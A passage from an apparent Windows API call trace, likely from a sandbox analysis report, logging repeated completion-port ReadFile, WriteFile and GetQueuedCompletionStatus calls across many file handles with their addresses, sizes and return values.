lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.867] ReadFile (in: hFile=0x134, lpBuffer=0x4ca0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4ca0020) returned 1 [0149.868] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.868] WriteFile (in: hFile=0x1a8, lpBuffer=0x4700124, nNumberOfBytesToWrite=0x14f6, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4700020) returned 0x0 [0149.868] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.869] ReadFile (in: hFile=0x658, lpBuffer=0x4dc0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4dc0020 | out: lpBuffer=0x4dc0124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4dc0020) returned 1 [0149.869] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.869] WriteFile (in: hFile=0x368, lpBuffer=0x4820124, nNumberOfBytesToWrite=0xbd55, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4820020) returned 0x0 [0149.869] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.869] ReadFile (in: hFile=0x620, lpBuffer=0x4ee0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4ee0020 | out: lpBuffer=0x4ee0124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4ee0020) returned 1 [0149.870] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.870] ReadFile (in: hFile=0x2e0, lpBuffer=0x5000124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x5000020 | out: lpBuffer=0x5000124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x5000020) returned 1 [0149.870] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.870] ReadFile (in: hFile=0x644, lpBuffer=0x5120124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x5120020 | out: lpBuffer=0x5120124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x5120020) returned 1 [0149.870] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.870] WriteFile (in: hFile=0x674, lpBuffer=0x4940124, nNumberOfBytesToWrite=0x16da2, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4940020) returned 0x0 [0149.871] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.871] WriteFile (in: hFile=0x640, lpBuffer=0x4a60124, nNumberOfBytesToWrite=0x7af4, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4a60020) returned 0x0 [0149.871] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.871] ReadFile (in: hFile=0x65c, lpBuffer=0x5240124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x5240020 | out: lpBuffer=0x5240124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x5240020) returned 1 [0149.937] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.937] ReadFile (in: hFile=0x668, lpBuffer=0x5480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x5480020 | out: lpBuffer=0x5480124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x5480020) returned 1 [0149.937] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.937] ReadFile (in: hFile=0x664, lpBuffer=0x55a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x55a0020 | out: lpBuffer=0x55a0124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x55a0020) returned 1 [0149.937] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.937] ReadFile (in: hFile=0x67c, lpBuffer=0x56c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x56c0020 | out: lpBuffer=0x56c0124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x56c0020) returned 1 [0149.937] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.938] ReadFile (in: hFile=0x630, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0149.938] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.938] ReadFile (in: hFile=0x638, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4280020) returned 0x0 [0149.938] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.938] WriteFile (in: hFile=0x670, lpBuffer=0x4b80124*, nNumberOfBytesToWrite=0x108cf, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4b80020) returned 1 [0149.938] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.939] WriteFile (in: hFile=0x134, lpBuffer=0x4ca0124*, nNumberOfBytesToWrite=0x15345, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4ca0020) returned 1 [0149.939] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.939] ReadFile (in: hFile=0x1a8, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4700020) returned 0x0 [0149.939] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.939] WriteFile (in: hFile=0x658, lpBuffer=0x4dc0124*, nNumberOfBytesToWrite=0x2cf7, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4dc0020 | out: lpBuffer=0x4dc0124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4dc0020) returned 1 [0149.940] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.940] ReadFile (in: hFile=0x368, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4820020) returned 0x0 [0149.940] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.940] WriteFile (in: hFile=0x620, lpBuffer=0x4ee0124*, nNumberOfBytesToWrite=0x13638, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4ee0020 | out: lpBuffer=0x4ee0124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4ee0020) returned 1 [0149.940] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.941] WriteFile (in: hFile=0x2e0, lpBuffer=0x5000124*, nNumberOfBytesToWrite=0x134a, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5000020 | out: lpBuffer=0x5000124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5000020) returned 1 [0149.941] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.941] WriteFile (in: hFile=0x644, lpBuffer=0x5120124*, nNumberOfBytesToWrite=0x5ef4, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5120020 | out: lpBuffer=0x5120124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5120020) returned 1 [0149.941] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.941] ReadFile (in: hFile=0x674, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4940020) returned 0x0 [0149.941] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.941] ReadFile (in: hFile=0x640, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4a60020) returned 0x0 [0149.942] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.942] WriteFile (in: hFile=0x648, lpBuffer=0x5360124*, nNumberOfBytesToWrite=0xddbc, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5360020 | out: lpBuffer=0x5360124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5360020) returned 1 [0149.942] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.943] WriteFile (in: hFile=0x65c, lpBuffer=0x5240124*, nNumberOfBytesToWrite=0x42400, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5240020 | out: lpBuffer=0x5240124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5240020) returned 1 [0149.944] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.944] WriteFile (in: hFile=0x668, lpBuffer=0x5480124*, nNumberOfBytesToWrite=0x52f, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5480020 | out: lpBuffer=0x5480124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x5480020) returned 1 [0149.944] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.944] WriteFile (in: hFile=0x664, lpBuffer=0x55a0124*, nNumberOfBytesToWrite=0x25e5, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x55a0020 | out: lpBuffer=0x55a0124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x55a0020) returned 1 [0149.944] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.945] WriteFile (in: hFile=0x67c, lpBuffer=0x56c0124*, nNumberOfBytesToWrite=0x59ba, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x56c0020 | out: lpBuffer=0x56c0124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x56c0020) returned 1 [0149.945] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.945] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0149.945] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.945] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0149.945] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.945] ReadFile (in: hFile=0x670, lpBuffer=0x4b80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4b80020) returned 0x0 [0149.945] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.945] ReadFile (in: hFile=0x134, lpBuffer=0x4ca0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4ca0020) returned 0x0 [0149.946] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.946] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0149.946] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.946] ReadFile (in: hFile=0x658, lpBuffer=0x4dc0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4dc0020 | out: lpBuffer=0x4dc0124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4dc0020) returned 0x0 [0149.946] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.946] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0149.946] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.946] ReadFile (in: hFile=0x620, lpBuffer=0x4ee0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4ee0020 | out: lpBuffer=0x4ee0124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4ee0020) returned 0x0 [0149.946] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.946] ReadFile (in: hFile=0x2e0, lpBuffer=0x5000124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x5000020 | out: lpBuffer=0x5000124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x5000020) returned 0x0 [0149.946] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.947] ReadFile (in: hFile=0x644, lpBuffer=0x5120124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x5120020 | out: lpBuffer=0x5120124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x5120020) returned 0x0 [0149.947] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.947] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0149.947] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.947] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0149.947] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.947] ReadFile (in: hFile=0x648, lpBuffer=0x5360124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x5360020 | out: lpBuffer=0x5360124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x5360020) returned 0x0 [0149.947] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.947] ReadFile (in: hFile=0x65c, lpBuffer=0x5240124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x5240020 | out: lpBuffer=0x5240124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x5240020) returned 0x0 [0149.947] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.947] ReadFile (in: hFile=0x668, lpBuffer=0x5480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x5480020 | out: lpBuffer=0x5480124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x5480020) returned 0x0 [0149.947] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.948] ReadFile (in: hFile=0x664, lpBuffer=0x55a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x55a0020 | out: lpBuffer=0x55a0124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x55a0020) returned 0x0 [0149.948] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.948] ReadFile (in: hFile=0x67c, lpBuffer=0x56c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x56c0020 | out: lpBuffer=0x56c0124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x56c0020) returned 